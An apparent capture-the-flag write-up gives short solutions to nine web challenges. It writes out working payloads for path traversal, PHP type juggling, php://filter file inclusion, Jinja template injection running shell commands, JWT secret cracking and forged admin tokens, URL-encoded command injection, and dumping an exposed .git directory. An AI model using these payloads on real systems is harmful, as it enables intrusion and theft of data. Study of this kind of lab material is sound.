Web Exploitation

Hot Access 70 points

Access to all the latest modules, hot off the press! What can you access? Connect here: http://jh2i.com:50016 ```shell http://jh2i.com:50016/?m=modules/../.htaccess Options Indexes FollowSymLinks MultiViews AllowOverride All Order allow,deny allow from all AllowOverride All http://jh2i.com:50016/sshh_dont_tell_i_hid_the_flag_here/flag.txt LLS{htaccess_can_control_what_you_access} Flag: LLS{htaccess_can_control_what_you_access} ```

PHPJuggler 80 points

PHP is here to entertain again! They’ve shown you magic tricks, disappearing acts, and now… juggling! Connect here: http://jh2i.com:50030. ![](../Files/juggler.png) ``` shell Php Type Juggling strcmp: submit POST requests with flag[]=flag Warning: strcmp() expects parameter 1 to be string, array given in /var/www/html/index.php on line 6 You got it! That's the correct flag! LLS{php_dropped_the_ball_again} Flag: LLS{php_dropped_the_ball_again} ```

Magician 80 points

Show me a hat trick! Connect here: http://jh2i.com:50000 ![](../Files/magician.png) ``` shell Magic Hash as whihehat security or 247CTF!!!: hash ==> 0e908377363673038390833004129775 password ==> f789bbc328a3d1a3e4UPoL Flag: LLS{magic_hashes_make_for_a_good_show} ```

GLHF 90 points

LMFAO! FLAG PLZ, THX! Connect here: http://jh2i.com:50014 ``` shell Local file inclusion: LFI: http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=index http://jh2i.com:50014/index.php?page=php://filter/convert.base64-encode/resource=FLAG PHPLFIXYZ

FLAG????

WTF, PLZ???

Flag: LLS{lmfao_php_filters_ftw} ```

MASK 90 points

Take off your mask. Connect here: http://jh2i.com:50023. ![](../Files/mask.png) ``` shell Server Side Template Injection: test ==> {{7*7}} response 49 {{config.__class__.__init__.__globals__['os'].popen('ls').read()}} ``` ![](../Files/mask0.png) ![](../Files/mask1.png) ``` shell {{config.__class__.__init__.__globals__['os'].popen('cat flag.txt').read()}} Flag: LLS{server_side_template_injection_unmasked} ```

JaWT 90 points

Check the admin's scratchpad! Connect here: http://jh2i.com:50019/ ![](../Files/jawt.png) ``` shell Challenge as PicoCTF and use crackjwt.py FOR JOHN python crackjwt.py "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc" /media/sf_D_DRIVE/WORDLISTS/rockyou.dic Cracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obiJ9.rbnjOn5BykmgvHXJyaasrM08WFQji58yEnmzkfQ8Wmc 1648it [00:00, 6560.78it/s] ('Found secret key:', 'fuckit') FOR ADMIN eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW4ifQ.qfSqP1u-gAhG6r8Vfb31Fi5WkjYCxjRKhFEcLCde8O0 Change value of cookie jwt Hello admin! Here is your JaWT scratchpad! LLS{jawt_was_just_what_you_thought} Flag: LLS{jawt_was_just_what_you_thought} ```

10 Character Web Shell 100 points

Only 10 char-- Connect here: http://jh2i.com:50001. ``` shell http://jh2i.com:50001/?c=cat%20flag* ``` ![](../Files/web.png) ``` shell Flag: LLS{you_really_can_see_in_the_dark} ```

Dairy Products 100 points

There is a new advertising campaign on the classic dairy company’s website. You need to steal their latest product. Connect here: http://142.93.3.19:50008 ```shell Just use wget because gitdumper.sh don't download repo. wget -r --no-parent http://142.93.3.19:50008/.git/ git status git --no-pager log -p | grep LLS{ LLS{you_gitm_gotm_good_partner} Flag: LLS{you_gitm_gotm_good_partner} ```

GET Encoded 125 points

I don't GET this%21 Do you%3F Connect here: http://jh2i.com:50013 ```shell robots.txt with /?debug ``` ![](../Files/encod.png) ```shell http://jh2i.com:50013/?%73ystem=ls flag_that_you_could_never_guess.php index.php robots.txt Machines hunt for more than humans do. http://jh2i.com:50013/?%73ystem=cat%20flag%5fthat%5fyou%5fcould%5fnever%5fguess.php Machines hunt for more than humans do. Flag: LLS{i_gotcha_url_encoding} ``` Return to the main menu Original writeup (https://github.com/Ne0Lux-C1Ph3r/WRITE- UP/blob/master/VirSecCon%20CTF/Web%20Exploitation/index.md).